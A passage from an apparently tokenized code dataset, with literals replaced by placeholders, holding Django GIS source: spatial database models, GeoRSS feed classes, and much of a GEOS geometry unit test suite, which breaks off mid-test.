verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> ordering = ( '<STR_LIT:url>' , ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . url , self . title ) <EOL> def get_absolute_url ( self ) : <EOL> return self . url </s>
<s> """<STR_LIT>""" <EOL> from django . contrib . gis . db import models <EOL> from django . contrib . gis . db . models . fields import GeometryField <EOL> from django . contrib . gis . db . backends . base import SpatialRefSysMixin <EOL> class GeometryColumns ( models . Model ) : <EOL> "<STR_LIT>" <EOL> table_name = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> column_name = models . CharField ( max_length = <NUM_LIT> ) <EOL> srid = models . IntegerField ( primary_key = True ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> managed = False <EOL> @ classmethod <EOL> def table_name_col ( cls ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def geom_col_name ( cls ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT>' % ( self . table_name , self . column_name , self . srid ) <EOL> class SpatialRefSys ( models . Model , SpatialRefSysMixin ) : <EOL> "<STR_LIT>" <EOL> cs_name = models . CharField ( max_length = <NUM_LIT> ) <EOL> srid = models . IntegerField ( primary_key = True ) <EOL> auth_srid = models . IntegerField ( ) <EOL> auth_name = models . CharField ( max_length = <NUM_LIT> ) <EOL> wktext = models . CharField ( max_length = <NUM_LIT> ) <EOL> cs_bounds = models . PolygonField ( null = True ) <EOL> objects = models . GeoManager ( ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> managed = False <EOL> @ property <EOL> def wkt ( self ) : <EOL> return self . wktext <EOL> @ classmethod <EOL> def wkt_col ( cls ) : <EOL> return '<STR_LIT>' </s>
<s> from django . contrib . syndication . feeds import Feed as BaseFeed , FeedDoesNotExist <EOL> from django . utils . feedgenerator import Atom1Feed , Rss201rev2Feed <EOL> class GeoFeedMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def georss_coords ( self , coords ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT:U+0020>' . join ( [ u'<STR_LIT>' % ( coord [ <NUM_LIT:1> ] , coord [ <NUM_LIT:0> ] ) for coord in coords ] ) <EOL> def add_georss_point ( self , handler , coords , w3c_geo = False ) : <EOL> """<STR_LIT>""" <EOL> if w3c_geo : <EOL> lon , lat = coords [ : <NUM_LIT:2> ] <EOL> handler . addQuickElement ( u'<STR_LIT>' , u'<STR_LIT>' % lat ) <EOL> handler . addQuickElement ( u'<STR_LIT>' , u'<STR_LIT>' % lon ) <EOL> else : <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( ( coords , ) ) ) <EOL> def add_georss_element ( self , handler , item , w3c_geo = False ) : <EOL> """<STR_LIT>""" <EOL> geom = item . get ( '<STR_LIT>' , None ) <EOL> if not geom is None : <EOL> if isinstance ( geom , ( list , tuple ) ) : <EOL> box_coords = None <EOL> if isinstance ( geom [ <NUM_LIT:0> ] , ( list , tuple ) ) : <EOL> if len ( geom ) == <NUM_LIT:2> : <EOL> box_coords = geom <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> if len ( geom ) == <NUM_LIT:2> : <EOL> self . add_georss_point ( handler , geom , w3c_geo = w3c_geo ) <EOL> elif len ( geom ) == <NUM_LIT:4> : <EOL> box_coords = ( geom [ : <NUM_LIT:2> ] , geom [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not box_coords is None : <EOL> if w3c_geo : raise ValueError ( '<STR_LIT>' ) <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( box_coords ) ) <EOL> else : <EOL> gtype = str ( geom . geom_type ) . lower ( ) <EOL> if gtype == '<STR_LIT>' : <EOL> self . add_georss_point ( handler , geom . 
coords , w3c_geo = w3c_geo ) <EOL> else : <EOL> if w3c_geo : raise ValueError ( '<STR_LIT>' ) <EOL> if gtype in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( geom . coords ) ) <EOL> elif gtype in ( '<STR_LIT>' , ) : <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( geom [ <NUM_LIT:0> ] . coords ) ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % geom . geom_type ) <EOL> class GeoRSSFeed ( Rss201rev2Feed , GeoFeedMixin ) : <EOL> def rss_attributes ( self ) : <EOL> attrs = super ( GeoRSSFeed , self ) . rss_attributes ( ) <EOL> attrs [ u'<STR_LIT>' ] = u'<STR_LIT>' <EOL> return attrs <EOL> def add_item_elements ( self , handler , item ) : <EOL> super ( GeoRSSFeed , self ) . add_item_elements ( handler , item ) <EOL> self . add_georss_element ( handler , item ) <EOL> def add_root_elements ( self , handler ) : <EOL> super ( GeoRSSFeed , self ) . add_root_elements ( handler ) <EOL> self . add_georss_element ( handler , self . feed ) <EOL> class GeoAtom1Feed ( Atom1Feed , GeoFeedMixin ) : <EOL> def root_attributes ( self ) : <EOL> attrs = super ( GeoAtom1Feed , self ) . root_attributes ( ) <EOL> attrs [ u'<STR_LIT>' ] = u'<STR_LIT>' <EOL> return attrs <EOL> def add_item_elements ( self , handler , item ) : <EOL> super ( GeoAtom1Feed , self ) . add_item_elements ( handler , item ) <EOL> self . add_georss_element ( handler , item ) <EOL> def add_root_elements ( self , handler ) : <EOL> super ( GeoAtom1Feed , self ) . add_root_elements ( handler ) <EOL> self . add_georss_element ( handler , self . feed ) <EOL> class W3CGeoFeed ( Rss201rev2Feed , GeoFeedMixin ) : <EOL> def rss_attributes ( self ) : <EOL> attrs = super ( W3CGeoFeed , self ) . rss_attributes ( ) <EOL> attrs [ u'<STR_LIT>' ] = u'<STR_LIT>' <EOL> return attrs <EOL> def add_item_elements ( self , handler , item ) : <EOL> super ( W3CGeoFeed , self ) . add_item_elements ( handler , item ) <EOL> self . 
add_georss_element ( handler , item , w3c_geo = True ) <EOL> def add_root_elements ( self , handler ) : <EOL> super ( W3CGeoFeed , self ) . add_root_elements ( handler ) <EOL> self . add_georss_element ( handler , self . feed , w3c_geo = True ) <EOL> class Feed ( BaseFeed ) : <EOL> """<STR_LIT>""" <EOL> feed_type = GeoRSSFeed <EOL> def feed_extra_kwargs ( self , obj ) : <EOL> return { '<STR_LIT>' : self . __get_dynamic_attr ( '<STR_LIT>' , obj ) } <EOL> def item_extra_kwargs ( self , item ) : <EOL> return { '<STR_LIT>' : self . __get_dynamic_attr ( '<STR_LIT>' , item ) } </s>
<s> from django . contrib . gis . geos import ( <EOL> GEOSGeometry as Geometry , GEOSException as GeometryException ) </s>
<s> import ctypes , random , unittest , sys <EOL> from django . contrib . gis . geos import * <EOL> from django . contrib . gis . geos . base import gdal , numpy , GEOSBase <EOL> from django . contrib . gis . geometry . test_data import TestDataMixin <EOL> class GEOSTest ( unittest . TestCase , TestDataMixin ) : <EOL> @ property <EOL> def null_srid ( self ) : <EOL> """<STR_LIT>""" <EOL> info = geos_version_info ( ) <EOL> if info [ '<STR_LIT:version>' ] == '<STR_LIT>' and info [ '<STR_LIT>' ] : <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> return None <EOL> def test00_base ( self ) : <EOL> "<STR_LIT>" <EOL> class FakeGeom1 ( GEOSBase ) : <EOL> pass <EOL> c_float_p = ctypes . POINTER ( ctypes . c_float ) <EOL> class FakeGeom2 ( GEOSBase ) : <EOL> ptr_type = c_float_p <EOL> fg1 = FakeGeom1 ( ) <EOL> fg2 = FakeGeom2 ( ) <EOL> fg1 . ptr = ctypes . c_void_p ( ) <EOL> fg1 . ptr = None <EOL> fg2 . ptr = c_float_p ( ctypes . c_float ( <NUM_LIT> ) ) <EOL> fg2 . ptr = None <EOL> for fg in ( fg1 , fg2 ) : <EOL> self . assertRaises ( GEOSException , fg . _get_ptr ) <EOL> bad_ptrs = ( <NUM_LIT:5> , ctypes . c_char_p ( '<STR_LIT>' ) ) <EOL> for bad_ptr in bad_ptrs : <EOL> self . assertRaises ( TypeError , fg1 . _set_ptr , bad_ptr ) <EOL> self . assertRaises ( TypeError , fg2 . _set_ptr , bad_ptr ) <EOL> def test01a_wkt ( self ) : <EOL> "<STR_LIT>" <EOL> for g in self . geometries . wkt_out : <EOL> geom = fromstr ( g . wkt ) <EOL> self . assertEqual ( g . ewkt , geom . wkt ) <EOL> def test01b_hex ( self ) : <EOL> "<STR_LIT>" <EOL> for g in self . geometries . hex_wkt : <EOL> geom = fromstr ( g . wkt ) <EOL> self . assertEqual ( g . hex , geom . 
hex ) <EOL> def test01b_hexewkb ( self ) : <EOL> "<STR_LIT>" <EOL> from binascii import a2b_hex <EOL> ogc_hex = '<STR_LIT>' <EOL> hexewkb_2d = '<STR_LIT>' <EOL> hexewkb_3d = '<STR_LIT>' <EOL> pnt_2d = Point ( <NUM_LIT:0> , <NUM_LIT:1> , srid = <NUM_LIT> ) <EOL> pnt_3d = Point ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , srid = <NUM_LIT> ) <EOL> self . assertEqual ( ogc_hex , pnt_2d . hex ) <EOL> self . assertEqual ( ogc_hex , pnt_3d . hex ) <EOL> self . assertEqual ( hexewkb_2d , pnt_2d . hexewkb ) <EOL> if GEOS_PREPARE : <EOL> self . assertEqual ( hexewkb_3d , pnt_3d . hexewkb ) <EOL> self . assertEqual ( True , GEOSGeometry ( hexewkb_3d ) . hasz ) <EOL> else : <EOL> try : <EOL> hexewkb = pnt_3d . hexewkb <EOL> except GEOSException : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertEqual ( buffer ( a2b_hex ( hexewkb_2d ) ) , pnt_2d . ewkb ) <EOL> if GEOS_PREPARE : <EOL> self . assertEqual ( buffer ( a2b_hex ( hexewkb_3d ) ) , pnt_3d . ewkb ) <EOL> else : <EOL> try : <EOL> ewkb = pnt_3d . ewkb <EOL> except GEOSException : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT> , GEOSGeometry ( hexewkb_2d ) . srid ) <EOL> def test01c_kml ( self ) : <EOL> "<STR_LIT>" <EOL> for tg in self . geometries . wkt_out : <EOL> geom = fromstr ( tg . wkt ) <EOL> kml = getattr ( tg , '<STR_LIT>' , False ) <EOL> if kml : self . assertEqual ( kml , geom . kml ) <EOL> def test01d_errors ( self ) : <EOL> "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> for err in self . geometries . errors : <EOL> try : <EOL> g = fromstr ( err . wkt ) <EOL> except ( GEOSException , ValueError ) : <EOL> pass <EOL> self . assertRaises ( GEOSException , GEOSGeometry , buffer ( '<STR_LIT:0>' ) ) <EOL> print "<STR_LIT>" <EOL> class NotAGeometry ( object ) : <EOL> pass <EOL> self . assertRaises ( TypeError , GEOSGeometry , NotAGeometry ( ) ) <EOL> self . 
assertRaises ( TypeError , GEOSGeometry , None ) <EOL> def test01e_wkb ( self ) : <EOL> "<STR_LIT>" <EOL> from binascii import b2a_hex <EOL> for g in self . geometries . hex_wkt : <EOL> geom = fromstr ( g . wkt ) <EOL> wkb = geom . wkb <EOL> self . assertEqual ( b2a_hex ( wkb ) . upper ( ) , g . hex ) <EOL> def test01f_create_hex ( self ) : <EOL> "<STR_LIT>" <EOL> for g in self . geometries . hex_wkt : <EOL> geom_h = GEOSGeometry ( g . hex ) <EOL> geom_t = fromstr ( g . wkt ) <EOL> self . assertEqual ( geom_t . wkt , geom_h . wkt ) <EOL> def test01g_create_wkb ( self ) : <EOL> "<STR_LIT>" <EOL> from binascii import a2b_hex <EOL> for g in self . geometries . hex_wkt : <EOL> wkb = buffer ( a2b_hex ( g . hex ) ) <EOL> geom_h = GEOSGeometry ( wkb ) <EOL> geom_t = fromstr ( g . wkt ) <EOL> self . assertEqual ( geom_t . wkt , geom_h . wkt ) <EOL> def test01h_ewkt ( self ) : <EOL> "<STR_LIT>" <EOL> srid = <NUM_LIT> <EOL> for p in self . geometries . polygons : <EOL> ewkt = '<STR_LIT>' % ( srid , p . wkt ) <EOL> poly = fromstr ( ewkt ) <EOL> self . assertEqual ( srid , poly . srid ) <EOL> self . assertEqual ( srid , poly . shell . srid ) <EOL> self . assertEqual ( srid , fromstr ( poly . ewkt ) . srid ) <EOL> def test01i_json ( self ) : <EOL> "<STR_LIT>" <EOL> if not gdal or not gdal . GEOJSON : return <EOL> for g in self . geometries . json_geoms : <EOL> geom = GEOSGeometry ( g . wkt ) <EOL> if not hasattr ( g , '<STR_LIT>' ) : <EOL> self . assertEqual ( g . json , geom . json ) <EOL> self . assertEqual ( g . json , geom . geojson ) <EOL> self . assertEqual ( GEOSGeometry ( g . wkt ) , GEOSGeometry ( geom . json ) ) <EOL> def test01k_fromfile ( self ) : <EOL> "<STR_LIT>" <EOL> from StringIO import StringIO <EOL> ref_pnt = GEOSGeometry ( '<STR_LIT>' ) <EOL> wkt_f = StringIO ( ) <EOL> wkt_f . write ( ref_pnt . wkt ) <EOL> wkb_f = StringIO ( ) <EOL> wkb_f . write ( str ( ref_pnt . wkb ) ) <EOL> for fh in ( wkt_f , wkb_f ) : <EOL> fh . 
seek ( <NUM_LIT:0> ) <EOL> pnt = fromfile ( fh ) <EOL> self . assertEqual ( ref_pnt , pnt ) <EOL> def test01k_eq ( self ) : <EOL> "<STR_LIT>" <EOL> p = fromstr ( '<STR_LIT>' ) <EOL> self . assertEqual ( p , p . wkt ) <EOL> self . assertNotEqual ( p , '<STR_LIT:foo>' ) <EOL> ls = fromstr ( '<STR_LIT>' ) <EOL> self . assertEqual ( ls , ls . wkt ) <EOL> self . assertNotEqual ( p , '<STR_LIT:bar>' ) <EOL> for g in ( p , ls ) : <EOL> self . assertNotEqual ( g , None ) <EOL> self . assertNotEqual ( g , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> self . assertNotEqual ( g , False ) <EOL> def test02a_points ( self ) : <EOL> "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for p in self . geometries . points : <EOL> pnt = fromstr ( p . wkt ) <EOL> self . assertEqual ( pnt . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( pnt . geom_typeid , <NUM_LIT:0> ) <EOL> self . assertEqual ( p . x , pnt . x ) <EOL> self . assertEqual ( p . y , pnt . y ) <EOL> self . assertEqual ( True , pnt == fromstr ( p . wkt ) ) <EOL> self . assertEqual ( False , pnt == prev ) <EOL> self . assertAlmostEqual ( p . x , pnt . tuple [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( p . y , pnt . tuple [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> if hasattr ( p , '<STR_LIT:z>' ) : <EOL> self . assertEqual ( True , pnt . hasz ) <EOL> self . assertEqual ( p . z , pnt . z ) <EOL> self . assertEqual ( p . z , pnt . tuple [ <NUM_LIT:2> ] , <NUM_LIT:9> ) <EOL> tup_args = ( p . x , p . y , p . z ) <EOL> set_tup1 = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> set_tup2 = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> else : <EOL> self . assertEqual ( False , pnt . hasz ) <EOL> self . assertEqual ( None , pnt . z ) <EOL> tup_args = ( p . x , p . y ) <EOL> set_tup1 = ( <NUM_LIT> , <NUM_LIT> ) <EOL> set_tup2 = ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( p . centroid , pnt . centroid . tuple ) <EOL> pnt2 = Point ( tup_args ) <EOL> pnt3 = Point ( * tup_args ) <EOL> self . 
assertEqual ( True , pnt == pnt2 ) <EOL> self . assertEqual ( True , pnt == pnt3 ) <EOL> pnt . y = <NUM_LIT> <EOL> pnt . x = <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , pnt . y ) <EOL> self . assertEqual ( <NUM_LIT> , pnt . x ) <EOL> pnt . tuple = set_tup1 <EOL> self . assertEqual ( set_tup1 , pnt . tuple ) <EOL> pnt . coords = set_tup2 <EOL> self . assertEqual ( set_tup2 , pnt . coords ) <EOL> prev = pnt <EOL> def test02b_multipoints ( self ) : <EOL> "<STR_LIT>" <EOL> for mp in self . geometries . multipoints : <EOL> mpnt = fromstr ( mp . wkt ) <EOL> self . assertEqual ( mpnt . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( mpnt . geom_typeid , <NUM_LIT:4> ) <EOL> self . assertAlmostEqual ( mp . centroid [ <NUM_LIT:0> ] , mpnt . centroid . tuple [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( mp . centroid [ <NUM_LIT:1> ] , mpnt . centroid . tuple [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> self . assertRaises ( GEOSIndexError , mpnt . __getitem__ , len ( mpnt ) ) <EOL> self . assertEqual ( mp . centroid , mpnt . centroid . tuple ) <EOL> self . assertEqual ( mp . coords , tuple ( m . tuple for m in mpnt ) ) <EOL> for p in mpnt : <EOL> self . assertEqual ( p . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( p . geom_typeid , <NUM_LIT:0> ) <EOL> self . assertEqual ( p . empty , False ) <EOL> self . assertEqual ( p . valid , True ) <EOL> def test03a_linestring ( self ) : <EOL> "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for l in self . geometries . linestrings : <EOL> ls = fromstr ( l . wkt ) <EOL> self . assertEqual ( ls . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ls . geom_typeid , <NUM_LIT:1> ) <EOL> self . assertEqual ( ls . empty , False ) <EOL> self . assertEqual ( ls . ring , False ) <EOL> if hasattr ( l , '<STR_LIT>' ) : <EOL> self . assertEqual ( l . centroid , ls . centroid . tuple ) <EOL> if hasattr ( l , '<STR_LIT>' ) : <EOL> self . assertEqual ( l . tup , ls . tuple ) <EOL> self . 
assertEqual ( True , ls == fromstr ( l . wkt ) ) <EOL> self . assertEqual ( False , ls == prev ) <EOL> self . assertRaises ( GEOSIndexError , ls . __getitem__ , len ( ls ) ) <EOL> prev = ls <EOL> self . assertEqual ( ls , LineString ( ls . tuple ) ) <EOL> self . assertEqual ( ls , LineString ( * ls . tuple ) ) <EOL> self . assertEqual ( ls , LineString ( [ list ( tup ) for tup in ls . tuple ] ) ) <EOL> self . assertEqual ( ls . wkt , LineString ( * tuple ( Point ( tup ) for tup in ls . tuple ) ) . wkt ) <EOL> if numpy : self . assertEqual ( ls , LineString ( numpy . array ( ls . tuple ) ) ) <EOL> def test03b_multilinestring ( self ) : <EOL> "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for l in self . geometries . multilinestrings : <EOL> ml = fromstr ( l . wkt ) <EOL> self . assertEqual ( ml . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ml . geom_typeid , <NUM_LIT:5> ) <EOL> self . assertAlmostEqual ( l . centroid [ <NUM_LIT:0> ] , ml . centroid . x , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( l . centroid [ <NUM_LIT:1> ] , ml . centroid . y , <NUM_LIT:9> ) <EOL> self . assertEqual ( True , ml == fromstr ( l . wkt ) ) <EOL> self . assertEqual ( False , ml == prev ) <EOL> prev = ml <EOL> for ls in ml : <EOL> self . assertEqual ( ls . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ls . geom_typeid , <NUM_LIT:1> ) <EOL> self . assertEqual ( ls . empty , False ) <EOL> self . assertRaises ( GEOSIndexError , ml . __getitem__ , len ( ml ) ) <EOL> self . assertEqual ( ml . wkt , MultiLineString ( * tuple ( s . clone ( ) for s in ml ) ) . wkt ) <EOL> self . assertEqual ( ml , MultiLineString ( * tuple ( LineString ( s . tuple ) for s in ml ) ) ) <EOL> def test04_linearring ( self ) : <EOL> "<STR_LIT>" <EOL> for rr in self . geometries . linearrings : <EOL> lr = fromstr ( rr . wkt ) <EOL> self . assertEqual ( lr . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( lr . geom_typeid , <NUM_LIT:2> ) <EOL> self . assertEqual ( rr . 
n_p , len ( lr ) ) <EOL> self . assertEqual ( True , lr . valid ) <EOL> self . assertEqual ( False , lr . empty ) <EOL> self . assertEqual ( lr , LinearRing ( lr . tuple ) ) <EOL> self . assertEqual ( lr , LinearRing ( * lr . tuple ) ) <EOL> self . assertEqual ( lr , LinearRing ( [ list ( tup ) for tup in lr . tuple ] ) ) <EOL> if numpy : self . assertEqual ( lr , LinearRing ( numpy . array ( lr . tuple ) ) ) <EOL> def test05a_polygons ( self ) : <EOL> "<STR_LIT>" <EOL> bbox = ( - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> p = Polygon . from_bbox ( bbox ) <EOL> self . assertEqual ( bbox , p . extent ) <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for p in self . geometries . polygons : <EOL> poly = fromstr ( p . wkt ) <EOL> self . assertEqual ( poly . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( poly . geom_typeid , <NUM_LIT:3> ) <EOL> self . assertEqual ( poly . empty , False ) <EOL> self . assertEqual ( poly . ring , False ) <EOL> self . assertEqual ( p . n_i , poly . num_interior_rings ) <EOL> self . assertEqual ( p . n_i + <NUM_LIT:1> , len ( poly ) ) <EOL> self . assertEqual ( p . n_p , poly . num_points ) <EOL> self . assertAlmostEqual ( p . area , poly . area , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( p . centroid [ <NUM_LIT:0> ] , poly . centroid . tuple [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( p . centroid [ <NUM_LIT:1> ] , poly . centroid . tuple [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> self . assertEqual ( True , poly == fromstr ( p . wkt ) ) <EOL> self . assertEqual ( False , poly == prev ) <EOL> self . assertEqual ( True , poly != prev ) <EOL> ring = poly . exterior_ring <EOL> self . assertEqual ( ring . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( ring . geom_typeid , <NUM_LIT:2> ) <EOL> if p . ext_ring_cs : <EOL> self . assertEqual ( p . ext_ring_cs , ring . tuple ) <EOL> self . assertEqual ( p . ext_ring_cs , poly [ <NUM_LIT:0> ] . tuple ) <EOL> self . assertRaises ( GEOSIndexError , poly . 
__getitem__ , len ( poly ) ) <EOL> self . assertRaises ( GEOSIndexError , poly . __setitem__ , len ( poly ) , False ) <EOL> self . assertRaises ( GEOSIndexError , poly . __getitem__ , - <NUM_LIT:1> * len ( poly ) - <NUM_LIT:1> ) <EOL> for r in poly : <EOL> self . assertEqual ( r . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( r . geom_typeid , <NUM_LIT:2> ) <EOL> self . assertRaises ( TypeError , Polygon . __init__ , <NUM_LIT:0> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> self . assertRaises ( TypeError , Polygon . __init__ , '<STR_LIT:foo>' ) <EOL> rings = tuple ( r for r in poly ) <EOL> self . assertEqual ( poly , Polygon ( rings [ <NUM_LIT:0> ] , rings [ <NUM_LIT:1> : ] ) ) <EOL> ring_tuples = tuple ( r . tuple for r in poly ) <EOL> self . assertEqual ( poly , Polygon ( * ring_tuples ) ) <EOL> self . assertEqual ( poly . wkt , Polygon ( * tuple ( r for r in poly ) ) . wkt ) <EOL> self . assertEqual ( poly . wkt , Polygon ( * tuple ( LinearRing ( r . tuple ) for r in poly ) ) . wkt ) <EOL> def test05b_multipolygons ( self ) : <EOL> "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for mp in self . geometries . multipolygons : <EOL> mpoly = fromstr ( mp . wkt ) <EOL> self . assertEqual ( mpoly . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( mpoly . geom_typeid , <NUM_LIT:6> ) <EOL> self . assertEqual ( mp . valid , mpoly . valid ) <EOL> if mp . valid : <EOL> self . assertEqual ( mp . num_geom , mpoly . num_geom ) <EOL> self . assertEqual ( mp . n_p , mpoly . num_coords ) <EOL> self . assertEqual ( mp . num_geom , len ( mpoly ) ) <EOL> self . assertRaises ( GEOSIndexError , mpoly . __getitem__ , len ( mpoly ) ) <EOL> for p in mpoly : <EOL> self . assertEqual ( p . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( p . geom_typeid , <NUM_LIT:3> ) <EOL> self . assertEqual ( p . valid , True ) <EOL> self . assertEqual ( mpoly . wkt , MultiPolygon ( * tuple ( poly . clone ( ) for poly in mpoly ) ) . 
wkt ) <EOL> print "<STR_LIT>" <EOL> def test06a_memory_hijinks ( self ) : <EOL> "<STR_LIT>" <EOL> poly = fromstr ( self . geometries . polygons [ <NUM_LIT:1> ] . wkt ) <EOL> ring1 = poly [ <NUM_LIT:0> ] <EOL> ring2 = poly [ <NUM_LIT:1> ] <EOL> del ring1 <EOL> del ring2 <EOL> ring1 = poly [ <NUM_LIT:0> ] <EOL> ring2 = poly [ <NUM_LIT:1> ] <EOL> del poly <EOL> s1 , s2 = str ( ring1 ) , str ( ring2 ) <EOL> def test08_coord_seq ( self ) : <EOL> "<STR_LIT>" <EOL> for p in self . geometries . polygons : <EOL> if p . ext_ring_cs : <EOL> poly = fromstr ( p . wkt ) <EOL> cs = poly . exterior_ring . coord_seq <EOL> self . assertEqual ( p . ext_ring_cs , cs . tuple ) <EOL> self . assertEqual ( len ( p . ext_ring_cs ) , len ( cs ) ) <EOL> for i in xrange ( len ( p . ext_ring_cs ) ) : <EOL> c1 = p . ext_ring_cs [ i ] <EOL> c2 = cs [ i ] <EOL> self . assertEqual ( c1 , c2 ) <EOL> if len ( c1 ) == <NUM_LIT:2> : tset = ( <NUM_LIT:5> , <NUM_LIT> ) <EOL> else : tset = ( <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:8> ) <EOL> cs [ i ] = tset <EOL> for j in range ( len ( tset ) ) : <EOL> cs [ i ] = tset <EOL> self . assertEqual ( tset [ j ] , cs [ i ] [ j ] ) <EOL> def test09_relate_pattern ( self ) : <EOL> "<STR_LIT>" <EOL> g = fromstr ( '<STR_LIT>' ) <EOL> self . assertRaises ( GEOSException , g . relate_pattern , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> for rg in self . geometries . relate_geoms : <EOL> a = fromstr ( rg . wkt_a ) <EOL> b = fromstr ( rg . wkt_b ) <EOL> self . assertEqual ( rg . result , a . relate_pattern ( b , rg . pattern ) ) <EOL> self . assertEqual ( rg . pattern , a . relate ( b ) ) <EOL> def test10_intersection ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> i1 = fromstr ( self . geometries . intersect_geoms [ i ] . wkt ) <EOL> self . assertEqual ( True , a . 
intersects ( b ) ) <EOL> i2 = a . intersection ( b ) <EOL> self . assertEqual ( i1 , i2 ) <EOL> self . assertEqual ( i1 , a & b ) <EOL> a &= b <EOL> self . assertEqual ( i1 , a ) <EOL> def test11_union ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> u1 = fromstr ( self . geometries . union_geoms [ i ] . wkt ) <EOL> u2 = a . union ( b ) <EOL> self . assertEqual ( u1 , u2 ) <EOL> self . assertEqual ( u1 , a | b ) <EOL> a |= b <EOL> self . assertEqual ( u1 , a ) <EOL> def test12_difference ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> d1 = fromstr ( self . geometries . diff_geoms [ i ] . wkt ) <EOL> d2 = a . difference ( b ) <EOL> self . assertEqual ( d1 , d2 ) <EOL> self . assertEqual ( d1 , a - b ) <EOL> a -= b <EOL> self . assertEqual ( d1 , a ) <EOL> def test13_symdifference ( self ) : <EOL> "<STR_LIT>" <EOL> for i in xrange ( len ( self . geometries . topology_geoms ) ) : <EOL> a = fromstr ( self . geometries . topology_geoms [ i ] . wkt_a ) <EOL> b = fromstr ( self . geometries . topology_geoms [ i ] . wkt_b ) <EOL> d1 = fromstr ( self . geometries . sdiff_geoms [ i ] . wkt ) <EOL> d2 = a . sym_difference ( b ) <EOL> self . assertEqual ( d1 , d2 ) <EOL> self . assertEqual ( d1 , a ^ b ) <EOL> a ^= b <EOL> self . assertEqual ( d1 , a ) <EOL> def test14_buffer ( self ) : <EOL> "<STR_LIT>" <EOL> for bg in self . geometries . buffer_geoms : <EOL> g = fromstr ( bg . wkt ) <EOL> exp_buf = fromstr ( bg . buffer_wkt ) <EOL> quadsegs = bg . quadsegs <EOL> width = bg . width <EOL> self . assertRaises ( ctypes . ArgumentError , g . 
